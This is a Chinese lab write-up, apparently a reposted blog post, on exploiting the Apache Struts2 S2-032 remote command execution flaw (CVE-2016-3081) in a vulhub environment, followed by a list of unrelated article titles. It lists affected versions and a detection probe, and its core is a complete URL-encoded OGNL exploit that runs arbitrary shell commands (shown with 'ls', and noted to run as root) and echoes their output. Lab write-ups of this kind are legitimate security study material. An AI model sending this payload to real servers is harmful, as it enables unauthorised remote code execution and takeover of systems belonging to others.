当前位置: 首页 > news >正文

vulhub靶机struts2环境下的s2-032(CVE-2016-3081)(远程命令执行漏洞)

影响范围

Struts 2.3.19至2.3.20.2、2.3.21至2.3.24.1和2.3.25至2.3.28

当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。

漏洞搭建

没有特殊要求,请看

(3条消息) vulhub搭建方法_himobrinehacken的博客-CSDN博客
判断方式

检测 根目录参数?actionErrors=1111

如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。异常包括但不限于以下几种现象:

1、 页面直接出现 404 或者 500 等错误。

2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。

3、 页面的内容结构发生了明显的改变。

4、 页面发生了重定向。

漏洞利用

exp

http://192.168.21.182:8080/memoindex.action? 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setC 
haracterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23pa 
rameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23 
w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=ls

注意执行whoami时是root用户

http://www.lryc.cn/news/348522.html

相关文章:

  • Kubernetes之Headless Services
  • 银行监管报送系统系列介绍(十七):一表通2.0
  • 网络安全之OSPF进阶
  • Ubuntu虚拟机上推荐一款免费好用的git版本管理工具
  • python下载及安装
  • visual studio2022 JNI极简开发流程
  • Linux 第三十章
  • Linux网络——自定义序列化与反序列化
  • 大模型介绍
  • 【思维】根号分治
  • Linux线程(三)死锁与线程同步
  • SpringAMQP 发布订阅-TopicExchange
  • uniapp h5 配置代理服务器
  • 使用Apache Spark从MySQL到Kafka再到HDFS的数据转移
  • 一篇文章拿下Redis 通用命令
  • 锂电池充电充放电曲线分析
  • vue3 第二十九节 (vue3 事件循环之nextTick)
  • 使用Flask-SocketIO构建实时Web应用
  • 可重构柔性装配产线:为工业制造领域注入了新的活力
  • 懒人网址导航源码v3.9
  • springboot 开启缓存 @EnableCaching(使用redis)
  • Adobe After Effects AE v24.3.0 解锁版 (视频合成及视频特效制作)
  • Qt---文件系统
  • ruoyi-vue-pro 使用记录(2)
  • centos7中如何全局搜索一下nginx的配置文件?
  • 2024年5月10日有感复盘
  • C++通过json文件配置参数
  • idea连接远程仓库
  • 初始Django
  • leetcode56--合并区间